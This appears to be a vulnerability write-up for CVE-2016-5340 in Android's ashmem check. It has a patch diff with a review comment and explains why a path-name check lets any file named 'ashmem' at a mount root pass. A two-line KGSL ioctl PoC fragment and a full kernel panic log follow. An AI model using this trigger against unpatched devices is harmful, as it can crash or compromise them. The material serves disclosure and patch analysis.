2016-09-20

CVE-2016-5340

patch

 static int is_ashmem_file(struct file *file)
{
-   char fname[256], *name;
-   name = dentry_path(file->f_dentry, fname, 256);
-   return strcmp(name, "/ashmem") ? 0 : 1;
+   return (file->f_op == &ashmem_fops);
}
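Review bot: The new `file->f_op == &ashmem_fops` test carries no comment saying why the name-based check was dropped, and that rationale is what stops the next maintainer from "simplifying" back to a path comparison; I would add `/* Match on the driver's file_operations, not on the name: dentry_path() is relative to the mount, so any filesystem with a file called ashmem at its root reports "/ashmem". */` above the return. Comparing the operations pointer ties the identity check to the object the driver itself created, which a filesystem path never does. The crash log further down (PC in get_ashmem_file, LR in is_ashmem_file) appears consistent with a non-ashmem file passing the old check and then being handled as an ashmem file, though the dereference itself is outside this hunk, so that reading is inferred rather than shown.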

dentry_path: 获取文件全路径,相对挂载点

shell@hammerhead:/ $ mount
rootfs / rootfs ro,seclabel,relatime 0 0
tmpfs /dev tmpfs rw,seclabel,nosuid,relatime,mode=755 0 0
devpts /dev/pts devpts rw,seclabel,relatime,mode=600 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,seclabel,relatime 0 0
selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0
debugfs /sys/kernel/debug debugfs rw,relatime 0 0
none /acct cgroup rw,relatime,cpuacct 0 0
none /sys/fs/cgroup tmpfs rw,seclabel,relatime,mode=750,gid=1000 0 0
tmpfs /mnt/obb tmpfs rw,seclabel,relatime,mode=755,gid=1000 0 0
none /dev/cpuctl cgroup rw,relatime,cpu 0 0
/dev/block/platform/msm_sdcc.1/by-name/system /system ext4 ro,seclabel,relatime,data=ordered 0 0
/dev/block/platform/msm_sdcc.1/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,nomblk_io_submit,noauto_da_alloc,errors=panic,data=ordered 0 0

so, because dentry_path returns the path relative to its mount point, a file named ashmem at the root of any of these mounts is reported as "/ashmem" and passes the old strcmp check:


data, system, proc, /mnt/obb
/data/ashmem :  /ashmem
/data/local/tmp/ashmem: /local/tmp/ashmem
/mnt/obb/ashmem: /ashmem

poc

/* PoC fragment as quoted in the post: the KGSL GPU device node is opened and
 * a map-user-mem ioctl is issued. The backtrace in the crash log below shows
 * this ioctl travelling kgsl_ioctl -> kgsl_ioctl_map_user_mem ->
 * get_ashmem_file -> is_ashmem_file, i.e. reaching the function patched
 * above. fd_kgsl and param are declared outside this fragment; presumably
 * param describes the user memory to be mapped — not shown here. */
fd_kgsl = open("/dev/kgsl-3d0", O_RDWR);
ioctl(fd_kgsl, IOCTL_KGSL_MAP_USER_MEM, &param);

crash log

 dev="proc" ino=10477 scontext=u:r:untrusted_app:s0 tcontext=u:r:radio:s0 tclass=dir
[  269.002841] Unable to handle kernel NULL pointer dereference at virtual address 00000114
[  269.003276] pgd = e9f24000
[  269.003497] [00000114] *pgd=33293831, *pte=00000000, *ppte=00000000
[  269.020211] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[  269.020398] CPU: 0    Not tainted  (3.4.0-gd59db4e #1)
[  269.020506] PC is at get_ashmem_file+0x78/0x154
[  269.020676] LR is at is_ashmem_file+0x3c/0x68
[  269.020772] pc : [<c078e704>]    lr : [<c078df24>]    psr: 20000013
[  269.020776] sp : eb73ddb8  ip : eb73dc98  fp : eb73de1c
[  269.021027] r10: 00000004  r9 : c10e9008  r8 : eb73de5c
[  269.021196] r7 : eb73de58  r6 : eb73de54  r5 : c103a488  r4 : ebbc9240
[  269.021291] r3 : 19761abc  r2 : 00000000  r1 : c0deb698  r0 : 00000000
[  269.021464] Flags: nzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  269.021560] Control: 10c5787d  Table: 3232406a  DAC: 00000015
[  269.021729]
[  269.021731] PC: 0xc078e684:
[  269.021906] e684  c011b554 c12a52b4 e1a0c00d e92ddff0 e24cb004 e24dd03c e52de004 e8bd4000
[  269.022856] e6a4  e59f511c e1a08003 e1a06001 e1a07002 e1a0a000 e5953000 e50b3030 ebeb5d64
[  269.023810] e6c4  e3a0c000 e586c000 e587c000 e2504000 0a000036 e59f90ec e1d931b2 e3130004
[  269.024684] e6e4  1a000018 e1a00004 ebfffdfd e3500000 0a00000d e594207c e3a00000 e5864000
[  269.025645] e704  e5923114 e5873000 e5923118 e5883000 e51b2030 e5953000 e1520003 1a000001
[  269.026609] e724  e24bd028 e89daff0 ebe81142 e1a0100a e59f0094 eb0a27bf e1a00004 ebeb5e68
[  269.027563] e744  e3e00000 eafffff1 e1a0200d e3c23d7f e3c3303f e24b0041 e593300c e593c224
[  269.028451] e764  e1a01003 e50bc048 ebeb6f73 e594300c e1a02006 e51bc048 e594e01c e5933020
[  269.029408]
[  269.029411] LR: 0xc078dea4:
[  269.029585] dea4  e594311c e5941118 e5902008 e0810003 e1500002 8afffff1 e1a00003 e3a02000
[  269.030541] dec4  e12fff36 e595300c e59301ec e2800038 ebe8ad33 e3a00000 e89da878 e3e00015
[  269.031501] dee4  e89da878 e1a0c00d e92dd810 e24cb004 e24ddf43 e52de004 e8bd4000 e59f4040
[  269.032466] df04  e3a02c01 e24b1f46 e590000c e5943000 e50b3018 ebebb5a7 e59f1028 ebf19143
[  269.033348] df24  e51b2018 e5943000 e2700001 33a00000 e1520003 1a000001 e24bd010 e89da810
[  269.034303] df44  ebe8133c c103a488 c0deb690 e1a0c00d e92ddff0 e24cb004 e24dd00c e52de004
[  269.035262] df64  e8bd4000 e5913004 e1a09001 e3530000 0a00003b e5913000 e3130080 0a00003c
[  269.036153] df84  e59f60f4 e286003c eb0a64db e3500000 0a000037 e5b64058 e1540006 e5945000
[  269.037106]
[  269.037108] SP: 0xeb73dd38:
[  269.037357] dd38  ebbc9300 ea7f67c0 eb73dd5c c078e704 20000013 ffffffff eb73dda4 eb73de5c
[  269.038229] dd58  c10e9008 00000004 eb73de1c eb73dd70 c0106e98 c010022c 00000000 c0deb698
[  269.039179] dd78  00000000 19761abc ebbc9240 c103a488 eb73de54 eb73de58 eb73de5c c10e9008
[  269.040129] dd98  00000004 eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff
[  269.041004] ddb8  000080d0 c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0
[  269.041953] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.042829] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.043775] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.044652]
[  269.044654] IP: 0xeb73dc18:
[  269.044901] dc18  ec495100 c0278008 eb73dc64 eb73dc30 c0278bb4 c0277fd0 00000000 00000000
[  269.045780] dc38  00000028 00010000 c027c0ec c1034300 ec523480 eb73dc9c eb73de58 c027b63c
[  269.046749] dc58  eb73dc94 eb73dc68 c027b63c c0a29650 eb73dc84 00000100 c039bab0 00000000
[  269.047633] dc78  eb73dc94 c103a488 c103a488 eb73de54 eb73ddb4 00000017 eb73dd70 c104541c
[  269.048594] dc98  00000114 eb73de5c c10e9008 00000004 eb73dd6c eb73dcb8 c0100284 c0114744
[  269.049476] dcb8  00000000 ec523100 ec523680 00000000 ebbc90c0 ec6498c0 eb73dcec eb73dce0
[  269.050434] dcd8  c0a26edc c0a26d50 eb73dd1c eb73dcf0 c0384648 c0a26ed0 ec523124 00000000
[  269.051397] dcf8  eb73dd1c ebbc90c0 c12866f0 c103a488 ebbc9300 ea7f67c0 ebbc90d4 ebbc90d0
[  269.052351]
[  269.052353] FP: 0xeb73dd9c:
[  269.052527] dd9c  eb73de1c eb73dc98 eb73ddb8 c078df24 c078e704 20000013 ffffffff 000080d0
[  269.053480] ddbc  c04aad10 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8
[  269.054363] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.055324] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.056282] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.057240] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.058119] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.059070] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.060026]
[  269.060029] R1: 0xc0deb618:
[  269.060202] b618  613e363c 656d6873 69203a6d 6974696e 7a696c61 000a6465 2f766564 6d687361
[  269.061160] b638  002f6d65 2f766564 6d687361 00006d65 613e333c 656d6873 66203a6d 656c6961
[  269.062118] b658  6f742064 726e7520 73696765 20726574 6373696d 76656420 21656369 0000000a
[  269.063000] b678  613e363c 656d6873 75203a6d 616f6c6e 0a646564 00000000 6873612f 006d656d
[  269.063958] b698  613e333c 656d6873 25203a6d 72203a73 65757165 64657473 74616420 72662061
[  269.064909] b6b8  66206d6f 20656c69 63736564 74706972 7420726f 20746168 73656f64 2074276e
[  269.065797] b6d8  73697865 000a2e74 706c6966 20702520 76656472 20642520 20646970 25287525
[  269.066754] b6f8  66202973 20656c69 25287025 2029646c 20766564 203a6469 000a6425 663e333c
[  269.067710]
[  269.067713] R4: 0xebbc91c0:
[  269.067888] 91c0  00000000 00000000 ed3c8a00 00000000 00000000 00000000 00000000 00000000
[  269.068842] 91e0  00000000 00000000 ffffffff ffffffff 00000000 00000000 eb761dc0 eb761b00
[  269.069803] 9200  ebbc9200 ebbc9200 ebbc9208 ebbc9208 ed34d5f0 00000000 00000000 00000000
[  269.070680] 9220  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.071635] 9240  ebbc9cc0 fefe1274 ed2f3e50 ec523480 c0b19540 00000000 00000000 00000002
[  269.072584] 9260  00020002 0000001f 00000000 00000000 00000000 00000000 00000000 00000000
[  269.073465] 9280  00000000 00000000 eaff1d00 00000000 00000000 00000000 00000000 00000020
[  269.074334] 92a0  00000000 00000000 ffffffff ffffffff 00000000 00000000 ea7f6800 00000000
[  269.075298]
[  269.075301] R5: 0xc103a408:
[  269.075477] a408  0fbd0b82 c561aad9 046a0e5f ceb6af04 90d34de8 5a0fecb3 a5d9c4e1 6f0565ba
[  269.076437] a428  31608756 fbbc260d 3ab7828b f06b23d0 ae0ec13c 64d26067 215c8068 4a3d3003
[  269.077396] a448  a02ec7d8 e2850203 a3c40529 c9478a99 5269f8b0 155b7d2b a6c55264 4fb78cab
[  269.078270] a468  db234dfd f3d3f258 c0dad457 449e4cdb 3c1e80d2 59791ef8 00000001 00000000
[  269.079152] a488  19761abc c010d028 ffffffff 00000009 0007b0d7 c0118560 c0118514 c01182c0
[  269.080109] a4a8  c011836c c0118384 c0118384 c0118388 c0118388 c0118404 c01184ec c01184fc
[  269.081061] a4c8  c011843c c0118484 c01184b8 00000022 ffffffff 00000000 fa002000 fa003000
[  269.082008] a4e8  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  269.082886]
[  269.082888] R6: 0xeb73ddd4:
[  269.083137] ddd4  c03f06e0 ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00
[  269.084019] ddf4  eb73c000 00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c
[  269.084972] de14  eb73de20 c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c
[  269.085926] de34  14104a1b 00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90
[  269.086876] de54  ebbc9240 00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488
[  269.087752] de74  c04aaccc eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0
[  269.088711] de94  00000004 00501000 00000000 00000000 00500000 00000001 00000000 00000009
[  269.089669] deb4  00000001 eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc
[  269.090551]
[  269.090554] R7: 0xeb73ddd8:
[  269.090803] ddd8  ec044ff8 c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000
[  269.091762] ddf8  00500000 ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20
[  269.092645] de18  c04ab018 c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b
[  269.093604] de38  00000008 ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240
[  269.094559] de58  00000000 00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc
[  269.095443] de78  eb73de94 bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004
[  269.096406] de98  00501000 00000000 00000000 00500000 00000001 00000000 00000009 00000001
[  269.097364] deb8  eb73c000 eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc
[  269.098314]
[  269.098316] R8: 0xeb73dddc:
[  269.098492] dddc  c03f0780 eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000
[  269.099442] ddfc  ed2b0580 eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018
[  269.100320] de1c  c078e698 c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008
[  269.101272] de3c  ed34ac20 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000
[  269.102229] de5c  00002000 eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94
[  269.103183] de7c  bed22a68 eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000
[  269.104066] de9c  00000000 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000
[  269.105015] debc  eb73df14 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c
[  269.105967]
[  269.105969] R9: 0xc10e8f88:
[  269.106145] 8f88  0000002c 00000000 c0d4c634 c0babed4 c0de8d3c c0de8db4 00000033 00000000
[  269.107094] 8fa8  c0d4c634 c0babed4 c0de8d3c c0de8de0 0000003a 00000000 c0d4c634 c0babed4
[  269.108046] 8fc8  c0de8d3c c0de8e00 0000004b 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e1c
[  269.108925] 8fe8  0000001e 00000000 c0de8ed0 c0babeec c0de8ed8 c0de8e3c 00000026 00000000
[  269.109881] 9008  c0deb640 c0bac2e8 c0deb748 c0deb6e0 0000032c 00000000 c0deb640 c0bac2f8
[  269.110837] 9028  c0deb748 c0deb6e8 00000343 00000000 c0d06940 c0bac57c c0ded100 c0d6a0d0
[  269.111798] 9048  000000eb 00000000 c0d06940 c0bac5a8 c0ded100 c0debe08 0000043f 00000000
[  269.112684] 9068  c0d06940 c0bac5a8 c0ded100 c0debe28 00000441 00000000 c0d06940 c0bac5a8
[  269.113573] Process poc (pid: 3498, stack limit = 0xeb73c2f0)
[  269.113744] Stack: (0xeb73ddb8 to 0xeb73e000)
[  269.113841] dda0:                                                       000080d0 c04aad10
[  269.114015] ddc0: 0000005c c0a29194 eb73c000 c0a2925c eb73de0c c03f06e0 ec044ff8 c03f0780
[  269.114113] dde0: eb73de0c eb73ddf0 c03f0780 19761abc ea461e00 eb73c000 00500000 ed2b0580
[  269.114287] de00: eb73de94 ebbc90c0 00002000 ea2318f0 eb73de8c eb73de20 c04ab018 c078e698
[  269.114459] de20: c027147c c026f070 eded7280 c026eeb0 eb73de6c 14104a1b 00000008 ed34ac20
[  269.114633] de40: 00000020 eb73df60 00000004 eac28c00 eb73de90 ebbc9240 00000000 00002000
[  269.114733] de60: eb73decc c01c0915 0000001c ea7f67c0 c103a488 c04aaccc eb73de94 bed22a68
[  269.114907] de80: eb73df04 eb73de90 c04aa810 c04aacd8 ed59b6d0 00000004 00501000 00000000
[  269.115078] dea0: 00000000 00500000 00000001 00000000 00000009 00000001 eb73c000 eb73df14
[  269.115176] dec0: 00000000 00000001 ed34ac20 eaff1d00 eb73defc 19761abc c0398d0c 00000000
[  269.115349] dee0: ebbc9300 00000005 ebbc9300 bed22a68 ed34ac20 00000000 eb73df74 eb73df08
[  269.115522] df00: c02753ac c04aa5dc c0279324 00000000 00000000 00000001 00000000 ed59b6d0
[  269.115695] df20: ededee00 eb73df0c 00000005 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115792] df40: eb73c000 00000000 eb73df64 00000000 bed22a68 c01c0915 ebbc9300 00000005
[  269.115964] df60: eb73c000 00000000 eb73dfa4 eb73df78 c0275950 c0275324 ffffffff 00000000
[  269.116141] df80: c0107544 00000000 bed22a68 ffffffff 00000036 c0107544 00000000 eb73dfa8
[  269.116317] dfa0: c0107300 c02758e0 00000000 bed22a68 00000005 c01c0915 bed22a68 bed22a38
[  269.116414] dfc0: 00000000 bed22a68 ffffffff 00000036 000080f4 00000000 00000000 bed22aec
[  269.116589] dfe0: 00500000 bed22a28 0000e377 0001120c 80000010 00000005 00000000 00000000
[  269.116793] [<c078e704>] (get_ashmem_file+0x78/0x154) from [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00)
[  269.116981] [<c04ab018>] (kgsl_ioctl_map_user_mem+0x34c/0xa00) from [<c04aa810>] (kgsl_ioctl+0x240/0x31c)
[  269.117088] [<c04aa810>] (kgsl_ioctl+0x240/0x31c) from [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc)
[  269.117267] [<c02753ac>] (do_vfs_ioctl+0x94/0x5bc) from [<c0275950>] (sys_ioctl+0x7c/0x8c)
[  269.117453] [<c0275950>] (sys_ioctl+0x7c/0x8c) from [<c0107300>] (ret_fast_syscall+0x0/0x30)
[  269.117632] Code: 0a00000d e594207c e3a00000 e5864000 (e5923114)
[  269.121735] ---[ end trace 032dae055767b39f ]---
[  269.121877] Kernel panic - not syncing: Fatal exception
[  270.122308] Rebooting in 5 seconds..
[  275.123947] Going down for restart now
[  275.124870] Calling SCM to disable SPMI PMIC arbiter
